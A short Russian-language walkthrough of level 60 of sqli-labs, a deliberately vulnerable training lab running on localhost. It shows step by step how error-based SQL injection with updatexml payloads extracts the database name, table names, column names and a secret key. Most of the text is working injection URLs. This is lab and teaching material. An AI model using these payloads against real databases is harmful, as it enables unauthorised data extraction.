sqli-labs (меньше-60)

sqli-labs (меньше-60)

Войдите в 60 уровней, войдите напрямую

http://127.0.0.1/sql1/Less-60/?id=1'

Страница нормальная, введите

http://127.0.0.1/sql1/Less-60/?id=1"

Согласно сообщению об ошибке, считается, что метод закрытия - ") - +, и это инъекция символов.
Поскольку имеется полное сообщение об ошибке, мы используем здесь атаку путем инъекции ошибок.

Просмотреть текущую библиотеку

http://127.0.0.1/sql1/Less-60/?id=1") and updatexml(1,concat(0x7e,(database()),0x7e),1)--+

Просмотреть все таблицы в библиотеке задач

http://127.0.0.1/sql1/Less-60/?id=1") and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e),1)--+

Просмотреть все поля под таблицей hsdu08stwn

http://127.0.0.1/sql1/Less-60/?id=1") and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='hsdu08stwn'),0x7e),1)--+

Просмотрите значение в поле secret_A755

http://127.0.0.1/sql1/Less-60/?id=1") and updatexml(1,concat(0x7e,(select group_concat(secret_A755) from challenges.hsdu08stwn),0x7e),1)--+

Успешно отправьте запрошенный КЛЮЧ